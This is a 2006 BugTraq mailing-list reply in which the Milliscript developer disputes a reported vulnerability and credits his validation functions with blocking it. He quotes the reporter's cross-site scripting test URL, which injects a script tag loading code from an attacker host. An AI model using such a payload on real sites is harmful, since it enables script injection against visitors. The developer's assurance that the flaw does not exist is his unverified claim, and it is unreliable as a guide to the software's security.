BugTraq
Re: Milliscript 1.4 Multiple Vulnerabilities May 10 2006 02:13PM
webmaster milliscripts com
Hello,

I never read anything else from you.

I checked the points you told me (bug in milliscripts redirection when

checking $domainname for example), but they are not true.

In /include/functions.php, *every* input is checked for validation.

The functions are called:

check_domain($dname)

check_domain2($dname, $extension)

check_string($string)

verify_email($email

check_forbidden($url1)

No invalid input can reach the script, there is no possibility the an

url like this causes any problem or security issue:

http://www.server.net/red_14/register.php?do=register2&domainname=%22%3E
%3Cscript%20src=http://serveratacker.com/script.js%3E%3C/script%3E&ext=s
omevaliddomain.net

Please test all scripts in content with the included files, like

functions.php. I don't know how you exactly test, but there can never

be any problems like you told them.

Please revise your security issue which never has been any.

Best regards

Alex

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus